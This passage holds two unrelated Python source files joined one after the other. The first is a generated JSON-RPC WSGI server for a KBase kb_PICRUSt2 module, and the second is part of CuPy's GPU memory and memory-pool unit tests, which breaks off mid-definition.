return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_PICRUSt2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_PICRUSt2.kb_PICRUSt2Impl import kb_PICRUSt2 # noqa @IgnorePep8
impl_kb_PICRUSt2 = kb_PICRUSt2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_PICRUSt2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_PICRUSt2.run_picrust2_pipeline,
name='kb_PICRUSt2.run_picrust2_pipeline',
types=[dict])
self.method_authentication['kb_PICRUSt2.run_picrust2_pipeline'] = 'required' # noqa
self.rpc_service.add(impl_kb_PICRUSt2.status,
name='kb_PICRUSt2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_PICRUSt2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import pytest
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed, memory.malloc_async],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if cupy.cuda.runtime.is_hip:
if self.allocator is memory.malloc_managed:
if cupy.cuda.driver.get_build_version() < 40300000:
raise unittest.SkipTest(
'Managed memory requires ROCm 4.3+')
else:
raise unittest.SkipTest(
'hipPointerGetAttributes does not support managed '
'memory')
if self.allocator is memory.malloc_async:
raise unittest.SkipTest('HIP does not support async mempool')
else:
if cupy.cuda.driver._is_cuda_python():
version = cupy.cuda.runtime.runtimeGetVersion()
else:
version = cupy.cuda.driver.get_build_version()
if version < 11020:
raise unittest.SkipTest('malloc_async is supported since '
'CUDA 11.2')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
@testing.parameterize(*testing.product({
'use_streams': [True, False],
}))
@testing.gpu
class TestMemoryPointerAsync(unittest.TestCase):
def setUp(self):
self.stream = stream_module.Stream() if self.use_streams else None
def test_copy_to_and_from_host_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ident == self.stream_ident
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ident == self.stream_ident
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ident == self.stream_ident
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ident == self.stream_ident
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ident == self.stream_ident
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ident == self.stream_ident
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ident == self.stream_ident
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
# do not free splitted blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
